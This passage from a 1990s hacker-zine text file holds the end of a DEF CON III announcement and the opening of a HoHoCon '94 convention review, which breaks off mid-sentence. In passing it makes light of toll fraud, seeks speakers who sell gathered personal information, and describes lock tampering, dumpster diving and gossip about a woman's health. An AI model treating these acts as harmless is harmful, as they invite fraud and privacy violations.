  10678. [> Lewis De Payne, aka "Roscoe"  TOPIC: Ultra Hacking - Beyond Computers:
  10679.    How to make your hacking more successful and productive while minimizing
  10680.    risk.  Learn how to adopt a business-like strategy, planning your goals,
  10681.    focusing your strategy and keeping you out of trouble!
  10682.  
  10683. [> Curtis Karnow, former federal prosecutor and attorney focusing on
  10684.    intellectual property litigation and computer law.  TOPIC: Agents in the
  10685.    telecommunications context, and "smart" software that we 'trust' to do the
  10686.    Right Thing.  The specific issue is legal liability and responsibility for
  10687.    the actions of intelligent agents, and then spinning off to chat about the
  10688.    liability for artificial intelligence generally.
  10689.  
  10690. [> Robert D. Steele, President of OPEN SOURCE SOLUTIONS, Inc.  A former Spy,
  10691.    Experienced Bureaucrat, Radical Visionary.  Tofflers call him the "rival
  10692.    store" to CIA.  Keynote Speaker at HOPE, Workshop at Hac-Tic '93.
  10693.    TOPIC: TBA
  10694.  
  10695. [> The Electronic Frontier Foundation.  TOPIC:  The EFF will cover current
  10696.    legal threats privacy and computer information networks.
  10697.  
  10698. [> Stephen Cobb.  TOPIC: "The Party's Over: Why Hacking Sucks." Stepehen
  10699.    intends to play "devil's advocate" and suggest that "hacking should not
  10700.    be tolerated in any shape or form as it serves no useful purpose and is a
  10701.    menace to society."
  10702.  
  10703. [> Jim Settle, ex-FBI computer crime division department head.  TOPIC: TBA
  10704.  
  10705. Speakers will be talking Saturday and Sunday, and maybe Friday depending.
  10706.  
  10707. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  10708.  
  10709.                                  SPECIAL EVENTS
  10710.  
  10711. So you think you're so damn smart, eh?  Think your shit doesn't stink?
  10712. Right. Think you got one up on the Feds, huh?  Well, now's your chance to
  10713. prove it smarty-pants.   Winn Schwartau will take command and moderate.
  10714.  
  10715.                            ! A N N O U N C I N G !
  10716.  
  10717.                         H A C K E R   J E O P A R D Y
  10718.  
  10719. That's right.  You can now prove how smart you really are.  Get up on stage
  10720. and question a few answers, pile up the points  . . . and win big!
  10721.  
  10722. You know the game.  You know the rules.  Now all you have to do is have the
  10723. guts, get up on stage in front of your peers and the narks and show us all!
  10724.  
  10725. When?  After Dark Tangent's opening speech (which we're all really looking
  10726. forward to . . . [yawn]  HACKER JEOPARDY starts!
  10727.  
  10728.                          MIDNIGHT - DAY 1 of DEF CON (Friday)
  10729.  
  10730. If you wanna play . . . show up.  If you don't wanna play, show up.
  10731.  
  10732. There will be three rounds of three people.  Just like real. The winners of
  10733. each round will go into the Finals and the winner of that will win 25,000
  10734. units of some foreign currency!  From Dark Tangent himself!  Plus:
  10735.  
  10736.      - A T-shirt three sizes to small for the women.
  10737.      - No T-shirts for the men.
  10738.      - Silk jackets for everyone.
  10739.      - One Heineken per player per round at DT's expense.
  10740.      - Round trip directions to Hoover Dam.
  10741.      - Phiber Optik's home address.
  10742.      - Erik Bloodaxe's Blood Samples.
  10743.      - And more . . .
  10744.  
  10745. Contestants will be picked at random from a pool of those who want to play.
  10746. If you don't wanna play, don't enter the contest.  Only the elite survive!
  10747.  
  10748. FEDS:  If you get picked to play, and we ask you what your job is, YOU HAVE
  10749. TO TELL THE TRUTH!  If you don't, our custom Fed-O-Meter will detect your
  10750. lies and off to the casinos you go!
  10751.  
  10752. Potential categories for questions include:
  10753.  
  10754. - - Famous Busts  - Famous Narks  - UNIX Bugs  - Telco Tech  - "Hacking"
  10755. and beware of the killer daily double.  Bribing the judge is acceptable.
  10756.  
  10757. EMail your suggested questions and answers to winn at winn@infowar.com
  10758.  
  10759. So, in the inimitable words of Al Bundy . . .  LET'S ROCK!
  10760.  
  10761.  
  10762.  
  10763.  
  10764.  
  10765.                        3rd ANNUAL SPOT THE FED CONTEST
  10766.                          Spot the fed, win the shirt
  10767.  
  10768. "Like a paranoid version of pin the tail on the donkey, the favorite sport
  10769. at this gathering of computer hackers and phone phreaks seems to be hunting
  10770. down real and imagined telephone security and Federal and local law
  10771. enforcement authorities who the attendees are certain are tracking their
  10772. every move.. .. Of course, they may be right."  John Markhoff, NYT
  10773.  
  10774. Basically the contest goes like this:  If you see some shady MB (Men in
  10775. Black) earphone penny loafer sunglass wearing Clint Eastwood to live and
  10776. die in L.A. type lurking about, point him out.  Just get my attention and
  10777. claim out loud you think you have spotted a fed.  The people around at the
  10778. time will then (I bet) start to discuss the possibility of whether or not a
  10779. real fed has been spotted.  Once enough people have decided that a fed has
  10780. been spotted, and the Identified Fed (I.F.) has had a say, and informal vote
  10781. takes place, and if enough people think it's a true fed, or fed wanna-be,
  10782. or other nefarious style character, you win a "I spotted the fed!" shirt,
  10783. and the I.F. gets an "I am the fed!" shirt.
  10784.  
  10785. Note to the feds:  This is all in good fun, and if you survive unmolested
  10786. and undetected, but would still secretly like an "I am the fed!" shirt to
  10787. wear around the office or when booting in doors, please contact me when no
  10788. one is looking and I will take your order(s).  Just think of all the looks
  10789. of awe you'll generate at work wearing this shirt while you file away all
  10790. the paperwork you'll have to generate over this convention.  I won't turn in
  10791. any feds who contact me, they have to be spotted by others.
  10792.  
  10793.  
  10794.  
  10795.  
  10796.  
  10797.              TELEPHONE CONFERENCE BRIDGE (801-855-3326)
  10798.  
  10799. For DEF CON III there will be a dial in conference set up.  If you are
  10800. overseas, or just too poor to make it to the convention this year, you can
  10801. still get an idea of what is going on and participate.  One part of the voice
  10802. conference equipment will allow you to listen to the convention room
  10803. microphone, another will allow you to ask questions during the Q&A sections
  10804. of peoples speeches.  A general conversation area will be up so you can chat
  10805. with others at the convention, or just others dialed into the bridge.
  10806. Navigate through the voice mail maze and get free phone sex!  Impress others!
  10807.  
  10808. The Voice bridge is up now at 801-855-3326.  It has 5 analog ports, but in a
  10809. few weeks will have eight digital ports for better sound, etc.
  10810.  
  10811.                      SPOOAH DOOPAH RAFFLE GIVE AWAY!@#
  10812.  
  10813. Throughout the convention, between speakers and events there will be a raffle
  10814. giveaway in which if your number is drawn, you win the prize.  Last year's
  10815. giveaway included an ancient kaypro monochrome portable, a roll of Sprint
  10816. "security" tape, "Computer Warriors" evil anti-virus cartoon, a 240 meg IDE
  10817. HD, and other elite things.
  10818.  
  10819. >> All the prizes given away are donated by other convention goers, so if <<
  10820. >> you have any stuff to give away, please save and donate it to the con! <<
  10821.  
  10822.                        RED BOX BUILDING CONTEST
  10823.  
  10824. While we don't encourage or condone the use of toll fraud devices, we do
  10825. encourage creativity and expression of thought.  We combine these and come
  10826. up with a red box creating contest.  The final device doesn't have to
  10827. produce the real red box tones (can't have people getting arrested) BUT it
  10828. does have to produce some audible tones, any kind of tones.  This contest
  10829. is inspired by last year's give away of a red box "Big Red" that looked just
  10830. like a big pack of Big Red gum, but really was a red box.  Elite!  There was
  10831. also a little girl's doll that was a red box, but the switch for that one was
  10832. hidden under the dress and, well, it just wasn't given away.
  10833.  
  10834. Come up with unique ideas!  With just a Hallmark card and some spare time you
  10835. can create an elite 007 style tone generating device!  What will you win if
  10836. yours is chosen as the most k-rad besides the envy of fellow hackers?  You'll
  10837. get a tee shirt and the cost of admission to the convention refunded PLUS
  10838. some as-of-yet undecided prize.  I bet you just can't wait to burn your
  10839. fingers with your soldering iron now!
  10840.  
  10841.                                 THE VIDEO ROOM
  10842.  
  10843. In one of the rooms a LCD wall projector will be hooked up connected to a
  10844. VCR, and people can bring flicks to play.  Stuff like Max Headroom, War Games
  10845. etc.  You know, the cool cheesey stuff.  Also some "hacker" videos will be
  10846. shown.  If you have something you wanna show, bring it along.  When the
  10847. projector is needed in the main conference room it will be swiped for the
  10848. duration.
  10849.  
  10850.                                 COOL VIDEO SHIT
  10851.  
  10852. At this time we are working to see if a T1 connection is possible.  If it is
  10853. there will be a cu-see me connection set up with multiple video cameras in
  10854. various locations.  Images will also be added automatically to a WWW page for
  10855. people to snag.  As all this works itself out there will be further
  10856. announcements.  No, there will be no "Hack our server" contests, and there
  10857. will be "Security Professionals" with "Diagnostic Tools" to "Correct" any
  10858. people who may cause the network problems.
  10859.  
  10860.                                SCAVENGER CONTEST
  10861.  
  10862. A scavenger contest is being planned.  The person or group with the most
  10863. number of items on the list wins the prize.  (Prize undetermined as of yet)
  10864. and there will be a few follow up prizes.  Don't forget to carry massive
  10865. amounts of water as you run about the concrete jungle, dehydration can
  10866. happen just crossing the street.  This is a contest for only the most k-rad.
  10867.  
  10868.                 GROUP BATTLE TECH SIMULATIONS AT VIRTUAL WORLD
  10869.  
  10870. DEF CON has reserved groups of Battle Tech Pods on Friday and Saturday in
  10871. order for people at the convention to battle it out in total VR mech-combat.
  10872. There will be two teams, the White Hats and Black Hats, who will oppose
  10873. eachother.  Each pod group <currently> consists of 8 pods, so it would be
  10874. 4 on 4 or we might join pod groups to make it an 8 on 8 battle.  In any
  10875. event you need to reserve you space in the pod battle groups if you want in
  10876. on the group action.  There will be battles going on Friday and Saturday
  10877. before 5pm.  Cost is $25 for one hour of simulation per person.  Currently
  10878. there are three pod groups of eight each open on Friday and two eight pod
  10879. groups open on Saturady.  As people sign up DEF CON will reserve more pod
  10880. groups if there is demand.
  10881.  
  10882. If you are to chicken to get in on the group battle action there will also
  10883. be a DEF CON group discount rate.
  10884.  
  10885. If you are interested in signing up for a seat in the group e-mail me the
  10886. day you want to participate and I will mail you back your log in name.  Give
  10887. preference of White or Black hat status.  You will need to pay the $25 in
  10888. advance to reserve your space.  Open spaces will be filled on a first come,
  10889. first serve basis, and also during the con there _should_ be spaces available.
  10890. The intent is get good con battle groups going.  A full battle tech info pack
  10891. will be availbe on the FTP site soon, as well as in future announcements and
  10892. on the mailing list.
  10893.  
  10894. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  10895.  
  10896.                              WHAT YOU CAN DO TO HELP
  10897.  
  10898. DEF CON III will be planned right up until the last minute, with problems
  10899. being fixed and new things being added all along.. a sort of work in progress
  10900. that you get to witness in person when you show up.  Hopefully it won't be
  10901. too messed up when presented to the public.  What can you do to help?
  10902.  
  10903. => Please help generate questions for Hacker Jeopardy.  Come up with some
  10904.    questions and answers, and Winn will decide which ones to use.  Mail 'em
  10905.    to winn@infowar.com.
  10906.  
  10907. - -> We are looking for people to speak on Personnel Information Gathering and
  10908.    selling.  Hopefully a speaker (who could remain anonymous) in this area
  10909.    has experiences in gathering and selling such information.  If you know
  10910.    of such a person, please invite them to contact me or let them know we
  10911.    are looking for such speakers.
  10912.  
  10913. - -> We are looking for some people to submit artwork to be used in the
  10914.    convention someplace.  It could be a poster, or in the program.  Black
  10915.    and white art would be eligible for the program only.
  10916.  
  10917. - -> Articles and interesting FTP sites, WWW pages, mini FAQs, etc. are all
  10918.    wanted for the program.  Quality articles that are informative and apply
  10919.    to the theme of the convention.  Scanner frequency lists,
  10920.  
  10921.  
  10922.  
  10923.  
  10924.  
  10925. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  10926.  
  10927.                          MORE DEF CON INFORMATION
  10928.  
  10929. The World Wide Web Page is located at: http://underground.org/defcon/
  10930.  
  10931. FTP Site: ftp.fc.net /pub/defcon
  10932.  
  10933. Mailing lists: mail majordomo@fc.net with the following statement in the body
  10934. of your message: subscribe dc-announce    This will set you up on the mailing
  10935. list and you will receive updated information, information on the other
  10936. mailing lists offered, etc.  I suggest joining the dc-stuff list just so you
  10937. can talk and plan with other people going to the con to coordinate rides,
  10938. sharing of rooms, etc.
  10939.  
  10940. Voice or Voice Mail:  0-700-826-4368 from a phone with AT&T LD.
  10941.                      or 206-626-2526
  10942.  
  10943. E-Mail: dtangent@defcon.org (The Dark Tangent)
  10944.  
  10945. Snail Mail: 2709 E. Madison #102, Seattle, WA, 98112
  10946.  
  10947. BBS System to call for info if you don't have net access:
  10948.  
  10949. Alliance Communications - +1 612 251 2511 - USRobotics HST DS 16800
  10950.                           NUP: New World Order
  10951.  
  10952. Voice Bridge Chat System: 801-855-3326
  10953.  
  10954. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  10955.  
  10956.                     INFORMATION ABOUT LAS VEGAS
  10957.  
  10958. NEWS GROUPS
  10959.  
  10960. Please note the following newsgroups may or may not be designated for local
  10961. distribution (Distribution: Vegas and/or nv), and is intended for all
  10962. systems in the Las Vegas area or those interested in same on the same level
  10963. as the la, ca, ba, ny, nyc, and other similar local higherarchies:
  10964.  
  10965. vegas.bi                Talk for bisexually natured persons
  10966. vegas.config            Configuration discussions for the higherarchy
  10967. vegas.food              Anything about food in Las Vegas
  10968. vegas.for-sale          For Sale/Want ads (no commercials, please!)
  10969. vegas.general           General discussion
  10970. vegas.jobs              Jobs offered and wanted in Las Vegas
  10971. vegas.motss             MOTSS community talk
  10972. vegas.personals         Personal ads - any nature
  10973. vegas.singles           Talk for singles
  10974. vegas.test              Group to test post to
  10975.  
  10976. WWW PAGES about Las Vegas, Hotels, Things to do, etc.
  10977.  
  10978. HTTP://www.infi.net:80/vegas/online/
  10979. HTTP://www.ocf.berkeley.edu/~iew/index.html
  10980. HTTP://www.best.com/~rdc/roger/vegas.html
  10981. HTTP://www.intermind.net/las.vegas.on-line/homepage.html
  10982.  
  10983. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  10984.  
  10985.                                  STUFF TO BUY
  10986.  
  10987. Stuff is for sale from DEF CON I and II in case you are interested.  From the
  10988. first year we have audio tapes (4 90 minute tapes) for $20 and the second
  10989. year (10 90 minute tapes) for $30.  Descriptions of these tapes are below.
  10990.  
  10991. DEF CON I Tapes (4) include the following speakers:
  10992.  
  10993. Ray Kaplan, Curtis Karnow, Gail Thackeray, Dead Addict, Dark Druid, Judi Clark
  10994. Dan Farmer, and Dr. Mark Ludwig.
  10995.  
  10996. DEF CON II Tapes (10) include the following speakers:
  10997.  
  10998. Phillip Zimmermann : Keynote Speaker, PGP.
  10999. Gail Thackeray : Response to Mr. Zimmermann and Privacy issues.
  11000. Chris Hall : Electronic Surveillance.
  11001. Curtis Karnow : Recombinant Culture, Crime in the Digital Network.
  11002. Dr. Mark Ludwig : Virus Creation Awards and What to do when the Feds come.
  11003. Judi Clark, Mara, Fen and Marianne in a Round Table Discussion.
  11004. The Dark Knight : Hacking in the UK
  11005. Sara Gordon, Mark Aldrich, Phil Zimmermann: Internet and PGP privacy concerns.
  11006. Annaliza (Torquie) : The European Underground scene.
  11007. Mark Lottor : Various cellular topics.
  11008. Winn Schwartau : HERF guns, Van Eck, Information Warfare
  11009. Peter Beruk : The role of the SPA, general Q&A.
  11010. Padgett Peterson : Anti-Virus writing, Cleaning up other peoples messes.
  11011. The Jackal : A basic radio overview with Q&A.
  11012. Artimage : Underground spoof and give aways.
  11013. Stephen Dunifer : Radio Free Berkeley and pirate media.
  11014. Damien Thorn : Random Cell information from the late night tech talks.
  11015.  
  11016. SHIRTS are still available to buy.  The ones remaining are long sleeve white
  11017. with the choice of two styles.  Both styles have a three color logo on the
  11018. front (Red, Gray, Black) with "DEF CON".  The back is either a list of
  11019. strange grep key words and "inside" keywords with "Why?  Because I can." at
  11020. the top.  Back #2 is the same back as DEF CON I with the old and "new" 4
  11021. Amendment as stated by J.P. Barlow with "Protect your rights, Encrypt your
  11022. data..." at the top.  The back on this style is two colors.. black lettering
  11023. framed in light gray for better definition.  Shirts are $20.
  11024.  
  11025. SHIPPING : If you buy anything, please include 2.90 for priority shipping.
  11026.  
  11027. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  11028.  
  11029.                                 LAST AND LEAST
  11030.  
  11031. OK!  Your almost ready to go.  Now here is an E-Z to follow checklist of
  11032. things you should take care of before throwing caution to the wind and
  11033. bailing out to the dangerous and sexy-wrong world of Las Vegas.  In the
  11034. words of one famous (and abused) phone system: "Sit up straight, PAY
  11035. ATTENTION, Listen to what your being told. (Now try again)"  (Whoever can
  11036. identify that phone system first gets in free)
  11037.  
  11038.                     StUPh 2 D0 b3fore the C0nvent1ion:
  11039.  
  11040. _  Check out inpho about Vegas so you know what you wanna do.
  11041. _  Get a hotel room or some crash pad.
  11042. _  Bring $40 for admission or pay $30 in advance.
  11043. _  Bring your PGP key on disk to key sign with others.
  11044. _  Bring Laptop, laplink, serial, and bizarre gender changer cables.
  11045. _  Bring things to donate for the give-away raffle.
  11046. _  Leave massively incriminating evidence at home.
  11047. _  Police scanners can provide hours of fun in Vegas.
  11048. _  Bring interesting videos to play in the video room.
  11049. _  Caffeine and snacks are fun to eat.
  11050. _  Don't forget any drugs or medication you may need.
  11051. _  You won't need saline for your contact lenses, you won't be sleeping.
  11052. _  Anything you promised your friends you would bring for them.
  11053. _  Join the mailing list and arrange rides or rooms with others in advance.
  11054.  
  11055. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  11056.  
  11057.                                  MY PGP KEY
  11058.  
  11059.                        This is the unsigned version
  11060.         My signed version is available on the public key-servers
  11061.  
  11062. - -----BEGIN PGP PUBLIC KEY BLOCK-----
  11063. Version: 2.6.1
  11064.  
  11065. mQCNAy6v5H8AAAEEAJ7xUzvdRFMtJW3CLRs2yXL0BC9dBiB6+hAPgBVqSWbHWVIT
  11066. /5A38LPA4zqeGnGpmZjGev6rPeFEGxDfoV68voLOonRPcea9d/ow0Aq2V5I0nUrl
  11067. LKU7gi3TgEXvhUmk04hjr8Wpr92cTEx4cIlvAeyGkoirb+cihstEqldGqClNAAUR
  11068. tCZUaGUgRGFyayBUYW5nZW50IDxkdGFuZ2VudEBkZWZjb24ub3JnPg==
  11069. =ngNC
  11070. - -----END PGP PUBLIC KEY BLOCK-----
  11071.  
  11072. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  11073.  
  11074.                       WHY IS THE ANNOUNCEMENT SIGNED?
  11075.  
  11076. Well, last year it came to my attention that some unknown person in
  11077. California had modified an announcement and was having people mail their
  11078. pre-registration money to them instead.  It was actually pretty funny.  Only
  11079. one person was fooled and lost 10$.  Not bad.  I knew something was up when
  11080. he said he had pre-registered for 10$ and had the receipt I had supposedly
  11081. mailed back.  I am never that organized!  To avoid potential problems like
  11082. this one please verify this announcement!@#  My key is available for
  11083. verification on public key servers, and my key-id is 46A8294D.  The
  11084. other key you will find on servers may be my older 1284bit key, which is
  11085. still good, but just not used to sign this text.
  11086.  
  11087. END ANNOUNCEMENT ------------------------------------------------------------
  11088.  
  11089. -----BEGIN PGP SIGNATURE-----
  11090. Version: 2.6.2
  11091.  
  11092. iQCzAwUBL4Hv6LGddDV5azd9AQHP2wTrBqZlL222IicVGNAphJTfaj3gDCQMWhfc
  11093. dXzCy20cAiymx/AmI5R2RpOhe/n2UJE99Ml97YKcVRLTFZNehvPorPbFZXeEURCN
  11094. QUvS13sEDn/PrxTxgd5pLgBsEx+HCGPvwK3W3BstwWR2srB4oap2SMSwZdLqDFMg
  11095. +kCCn17guAoHnUtqftvjUX2FOGt1AmVOf+cQM43RjpENUfOsBWg=
  11096. =vMBG
  11097. -----END PGP SIGNATURE-----
  11098.  
  11099.                               ==Phrack Magazine==
  11100.  
  11101.                  Volume Six, Issue Forty-Seven, File 10 of 22
  11102.  
  11103.  
  11104.                                   HoHoCon '94
  11105.                     December 29, 1994 - January 2, 1995
  11106.                        Ramada Inn South, Austin, TX
  11107.                  A Review, released to the Net on 1/25/95
  11108.                         By Netta "grayarea" Gilboa
  11109.  
  11110.  
  11111.    I flew to Austin, TX after spending Christmas with some hacker friends.
  11112. I arrived a day early, unsure if the Con was gonna come off and how many
  11113. people would show if it did. HoHoCon had almost been cancelled this year
  11114. after someone called the original hotel and said a bunch of mean, evil
  11115. hackers were gonna descend on the hotel and that several federal agencies
  11116. would be sending feds there to monitor it. If you ask me, some kid's mom
  11117. said he couldn't go so he decided to try to make sure none of us could
  11118. either. Lame. It also taught me that everyone in this community has
  11119. enemies. Maybe someone just doesn't like Drunkfux. Supposedly, right after
  11120. this phone call the hotel got another, this time from Dateline NBC who
  11121. wanted permission to film the Con. Rumor had it the hotel panicked and
  11122. cancelled. The truth is that a regular client of theirs offered to pay
  11123. higher room rates and the hotel stood to make over $20,000 extra by
  11124. getting rid of us and having them there instead. So they used the phone
  11125. calls as an excuse. I can only imagine the hassles Drunkfux went
  11126. through to find another hotel that was empty on New Year's Eve weekend.
  11127.  
  11128.    But Drunkfux came through with flying colors and when I got to the
  11129. hotel they told me other people had started to arrive. They gave me a
  11130. list of these people to look at, complete with their real names and room
  11131. numbers. It's possible they would even have xeroxed the list if I had
  11132. asked them to. Uncool. Even more uncool, almost shocking, was that the
  11133. hotel had a clipboard on the counter with people's real names, assigned
  11134. room number and credit card number complete with expiration date. It was
  11135. listed in alphabetical order and I was on the top page in the third spot.
  11136. I freaked. I told the woman behind the counter that she must move the
  11137. clipboard as some of the people coming specialized in attacking people's
  11138. credit and that I would surely be a target given my position on the list
  11139. and my all too well-known real name. She said okay but when I returned my
  11140. luggage cart, some twenty minutes later, it was still on the counter. I
  11141. told her again, nastier this time, to move it. An hour later she still had
  11142. not. I then asked to use a phone and was told there was one in my room and
  11143. another down the hall. I explained that I wanted to call right from the
  11144. counter to cancel my credit card and to call the national offices of Ramada
  11145. Inns to have her fired. In a nasty tone she told me she'd move the clipboard.
  11146. She did. However, the next day they threw the pages in the trash and, of
  11147. course, had the clipboard on the counter again with a new list of the people
  11148. due to check in that day. I argued with them again and they moved it. A few
  11149. hours later (surprise!) their trash was invaded and they went out and bought
  11150. two paper shredders. This was a good investment on their part although it's
  11151. a shame it took us to teach them that. If you intend to stay at a Ramada Inn
  11152. anywhere in the U.S., I would strongly advise you not to prepay with a credit
  11153. card. They can't be trusted with your data. We invite readers who may have
  11154. experienced credit card fraud after staying at Ramada Inns (or other hotels)
  11155. to contact us. It was a sobering lesson in how vulnerable the average person
  11156. is in society.
  11157.  
  11158.    I had plans to hook up with Stormbringer and Holy Spirit, two virus
  11159. writers I love talking to. Stormbringer had recently retired from virus
  11160. writing after hearing from someone in Singapore who got infected with
  11161. one of his non-malicious viruses. I had read his retirement text file and
  11162. was anxious to talk to him about it. He assured me on the phone all was well
  11163. and they agreed to meet me at Mr. Wasabi for sushi and I ate more sushi
  11164. than I ever had before in one sitting. Then we walked to a coffee house
  11165. and they drove me back to my hotel around 1 a.m.
  11166.  
  11167.    I was invited to Novocain and Particle's room so I headed up there and
  11168. ran into Veggie, Onkel Ditmeyer, Count Zero, Buckaroo, etc. Onkel showed
  11169. me his way cool laptop and I finally got to see what an IBM demo looks
  11170. like. These are programs which demonstrate the sound and graphics
  11171. capabilities of a computer. He copied a few of them on a disk for me along
  11172. with some electronic magazines I had never seen. Onkel is the author of a
  11173. well known phreaking program called Bluebeep. We spoke a lot over the
  11174. weekend and I found him brilliant, honest, charming and not afraid of
  11175. girls who know way less than him. He was one of the coolest people at
  11176. HoHoCon this year.
  11177.  
  11178.    At 6 a.m. a few of us went downstairs for free breakfast and the
  11179. conversation turned to the various women who hang out on #hack. There
  11180. was some dissing of one girl who has slept her way around the scene and
  11181. in the past had given a number of hackers herpes without telling them
  11182. first. Eeks. I tried to get out of the guys I was eating with what she
  11183. had that I didn't (besides herpes). I message most of her old lovers on
  11184. IRC but none has ever made a pass at me. We talked about the other girls
  11185. on IRC, who has slept with whom, and how they got treated afterwards. We
  11186. talked about why people might have slept with those particular girls at
  11187. the time they did and I suddenly felt both very lucky and better about
  11188. myself that the one hacker I had slept with was a decent choice. Quality
  11189. might beat quantity. To know for sure, I guess I'd have to ask the girls
  11190. <wink>.
  11191.  
  11192.    We picked up a bunch of food that was apparently not included in our
  11193. free breakfast coupon. The waitress didn't know how to handle it and
  11194. neither did we. I offered to put the food back and she finally agreed to
  11195. let us eat it. I suggested they put up a sign to warn others and, of
  11196. course, they didn't. Later I heard they let us all eat the bacon and other
  11197. food for the rest of the Con. I never made it back down there again even
  11198. though for American food it was pretty good. I was pretty tired and so
  11199. headed off to sleep when we were done chowing down.
  11200.  
  11201.    I woke up Friday afternoon when Particle and Novocain knocked on the
  11202. door. They had a car and took me to a Chinese restaurant nearby with a
  11203. killer buffet. When we got back there were many people in the lobby
  11204. listening to a tape of prank phone calls made by Phone Losers of America.
  11205. I wanted the tape bad as it seemed highly appropriate for us to review.
  11206. I was promised a copy which materialized in under an hour. W0rd! For all
  11207. the shit I take for it, there are advantages to being press.
  11208.  
  11209.    I felt pretty comfortable with all of the people I was talking to and
  11210. since my room was very close to the lobby I invited everyone there and
  11211. even left the door open for others to enter my room (which almost
  11212. everyone who passed by did). It was kind of odd where they had situated
  11213. me. You could watch my door from the counter where people checked in. I
  11214. had asked for a smoking room but got dealt non-smoking instead. I
  11215. inquired about changing it and was told some crap about all the rooms
  11216. being accounted for already. It crossed my mind at the time that maybe
  11217. some feds had purposely put me there but I discounted my gut feeling and
  11218. remembered most hackers thought I was too paranoid about things. I told
  11219. people to go ahead and smoke in my room with no ashtray. They did. All
  11220. told about 15 people were in there and one of them pulled out a toy
  11221. to show me. It was a box that hooked up to your telephone which allowed
  11222. you to change your voice into that of a male, female or child. I had seen
  11223. these boxes before in catalogs. They sure work great! I made two calls
  11224. with it, one to a friend and one to my ex-husband. I snickered at how
  11225. surprised they'd be when they heard my message and later regretted not
  11226. telling either or them to save it so I could hear it back. Honestly,
  11227. playing with this legal box was every bit as cool as great drugs or sex.
  11228. I vowed to buy one. Watch out!
  11229.  
  11230.    Talk turned to dinner and people started to leave my room. Particle was
  11231. the last one out and he showed me something about how the hotel room locks
  11232. worked. Hackers spend hours trying to figure out how things work and
  11233. although I had little interest in the subject it was clear Particle was
  11234. struck by the technology and not the idea of breaking into someone's
  11235. room. I started to organize people who were willing to eat sushi. Just as
  11236. we were about to leave Particle and Novocain were gathering everyone into
  11237. a room to tell people to chill their behavior. It later turned out that
  11238. Particle had played with another lock after I made him stop touching
  11239. mine. He had the misfortune to be seen by a member of the Austin Police
  11240. Department who wisely agreed not to arrest him in exchange for Particle's
  11241. agreeing to talk to people in an attempt to curtail the usual HoHoCon
  11242. hotel destruction. I should have attended this talk although I had no
  11243. idea at the time why it was being organized. But I was starving and
  11244. the people I took to eat sushi were not those who would consider trashing
  11245. a hotel. Laughing Gas, Thumper27, Slyme, El_Jefe and I checked out Kyoto
  11246. sushi which was good but expensive for what you got. I spent part of dinner
  11247. wiping the free space on the hard drive on my laptop. I had never used
  11248. this feature before, but had been told about it at the con and it sounded
  11249. like something I should start doing regularly to protect other people's
  11250. privacy so that erased E-mail and articles were truly erased. It was a
  11251. good thing I had sushi to eat to keep me busy as it took a good twenty
  11252. minutes to do on a Pentium laptop with a 500+ meg hard drive.
  11253.  
  11254.    When we got back to the hotel I ran into Drunkfux who had cut his
  11255. hair and dyed it bright red. I hardly recognized him but it looked great.
  11256. It was clear by the police presence in the lobby that the Con had
  11257. officially started. We were told that signs hung on room doors (I had
  11258. put up a copy of one of the magazine covers with a small piece of scotch
  11259. tape) would be taken down. This made it much harder for us to find each
  11260. other (I'd estimate we had 90% of the hotel's rooms) but so it goes.
  11261. Some people were told specifically that they could not use their modems
  11262. and for hours on Friday night the phone lines were so busy with modem
  11263. usage that there was no way to make an outgoing call or to receive an
  11264. expected incoming one. All sorts of security guards appeared. The ones
  11265. I spoke with were police officers too. I'd guess there were 1-3 dozen
  11266. around at all times and apparently hotel personnel were told they were
  11267. all on duty until we left and none of them were able to go home for the
  11268. rest of the weekend. I wish I could say this was utterly unwarranted.
  11269. But some lamer broke the lock on the door to the hotel's phone system.
  11270. And remember that another person had trashed the hotel's garbage and
  11271. must have made a mess or been spotted.
  11272.  
  11273.    The hot party that night was in Erik Bloodaxe's room. Loki, Ice-9
  11274. and Ophie were staying with him and Loki was in charge of the door.
  11275. He made sure to keep me out just as he does when he acts like a bully
  11276. on IRC. I knew in my heart it was Loki's doing not ErikB's, but that
  11277. didn't stop me from getting majorly upset about it anyway. I went
  11278. downstairs to be alone and Particle knocked on the door a few minutes
  11279. later. I gave him a piece of my mind and then some about how shitty
  11280. some of those in the computer underground are. I went on for at least
  11281. an hour and drew great comfort from the fact Particle thought I was not
  11282. crazy and that things are as awful as they seem sometimes. Finally
  11283. he told me that since I kept claiming to love hackers despite all of the
  11284. grief, there were dozens of nice ones out there who would be thrilled to
  11285. talk to me if I'd only leave my room and go try to have a good time. W0rd.
  11286. I took his advice and had a good time in the lobby with the other rejects
  11287. from Bloodaxe's party. The conversation was so good it was hard to tear
  11288. away to go to sleep. I went to my room at 4:30 a.m., got under the covers,
  11289. thought about sleep for 10 seconds. Then I pulled out my laptop and wrote
  11290. a speech to deliver to the crowd the next day.
  11291.  
  11292.    The two people I had counted on to wake me up didn't show and it was a
  11293. stroke of luck that made me jump up at 9:45. The speeches were supposed to
  11294. start at 10 a.m. and even though they surely wouldn't start till later I
  11295. was selling magazines and was due there pronto to claim my table. It took a
  11296. luggage cart to get all those magazines downstairs. I shudder to think what
  11297. my life will be like when I have 30 issues to lug around instead of six.
  11298. The folks from Fringeware were selling books and T-shirts and someone else
  11299. had old Atari game units and cartridges. People came by to say hi and to
  11300. buy magazines. I plugged my speech and told people not to dare miss it.
  11301.  
  11302.    It was impressive that Drunkfux had gotten so many original speakers
  11303. on such short notice. They mostly said what the crowd wanted to hear and
  11304. shared thoughts on digital cash, the regulation of the Internet, recent
  11305. laws, etc. Damien Thorn showed a video clip to the tune of the current
  11306. rock hit "21st Century Digital Boy" which had cellular phones, scanners,
  11307. etc. in it. It's part of an upcoming video that looked awesome. Veggie
  11308. talked about dealing with the media after an old text file of his was
  11309. used to harass a BBS sysop who got more than twice Phiber's jail sentence
  11310. just for having a file around.
  11311.  
  11312.    Someone sent Erik Bloodaxe to talk to me as part of my speech referred
  11313. to him. It was an uncomfortable talk and I was probably correct in feeling
  11314. that half the room was watching us and not whoever was speaking. I told
  11315. him he could pay me back in print or elsewhere but that I was going to
